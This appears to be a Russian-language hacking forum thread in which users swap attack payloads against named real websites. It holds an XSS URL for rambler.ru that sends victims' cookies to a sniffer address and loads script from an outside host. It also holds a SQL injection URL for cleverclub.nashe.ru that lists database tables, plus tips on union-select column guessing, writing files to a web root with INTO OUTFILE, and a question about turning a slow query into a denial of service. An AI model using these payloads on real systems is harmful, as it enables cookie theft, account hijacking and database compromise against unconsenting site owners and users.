для рамблера: Code: http://www.rambler.ru/db/support/feedback.shtml?name=<IMG%20SRC=javascript:location.href='адрес_снифера'%2bdocument.cookie>
А еще лучше http://www.rambler.ru/db/support/feedback.shtml?name=<script src=http://[путь к файлу с яваскриптом]></script> либо http://www.rambler.ru/db/support/feedback.shtml?name=<script>eval(unescape([тут эскейпенный код]))</script>
но как я туда вставлю ссылку на сниффер? он ведь картинкой! а если я просто путь вставлю то кукисы не придут точнее придут но не кукисы а так мусор
отлично, спс а можно этот запрос составить так, чтобы узнать какие ещё есть таблицы, а то тут только селект по одной таблице получается...
Хм, тут нарисовалась трабла. Я проводил скулю на сайтенге, и при -1 union select 1/* выдается ошибка The used SELECT statements have a different number of columns, хотя order by показывает что полей именно 1, но это не важно, я начал работать с подзапросами и при -1 union select 1 from users/* вылезла ошибка Table 'dk.users' doesn't exist а при запросе -1 union select 1 from information_schema.tables почему то опять же вылезла The used SELECT statements have a different number of columns Значит ли это что information_schema.tables существует и к ней есть доступ ?
Да. доступ к таблице есть. Запросов может быть несколько. пробуй union select 1,2/* и тд. пока не попадешь на праильное кол-во колонок
А разве если бы кол-во колонок было неверное мне бы выпадало Table 'dk.users' doesn't exist ? А, все, пасиб Basurman Подбирать поля - лень, я нашел более удобную скулю на этом же сайте, доступ к information_schema действительно существует =) Еще раз всем пасиб
вот смотри: Code: http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast((SELECT/**/TOP/**/1/**/table_name/**/From/**/information_schema.tables/**/where/**/table_name/**/not/**/in/**/('Rating1','HelpMessage'))/**/as/**/int)='1 в скобки, которые после not in подставляй очередное полученное имя таблицы и таким образом перебирай имена всех таблиц, а вобще почитай вот эту статью: Провидение Иньекций в MSSQL сервер от Microsoft
Если известен путь к папке с правами на запись и видной из веба, попробуй записать в файл -1 union select 1,2,...,n from some_table into outfile "/path/www/file.txt"/* blackybr: + from
Короче искал инъекцию,а нашел интересную уязвимость,дело в том что я сижу с телефона,и браузер опера мини(java) при загрузке объемных страниц ,разбивает их на несколько(в зависимости от веса,картинок,и т.д),так вот при составлении запроса на sql инъекцию таким образом: http//site.ru/?item=1+order+by+100/*,страница из скажем 15кб разрослась до 1500кб,тоесть просто размножился текст в 100 раз,и при этом выдало такую ошибкуHP Fatal error: Maximum execution time of 60 seconds exceeded in E:\xxx.ru\wwwroot\lost\index.php on line 287. Вопрос такой:с чем это связано и значит ли что если я увеличу число в запросе,к примеру до 1000000,то получится типа ддос атаки?
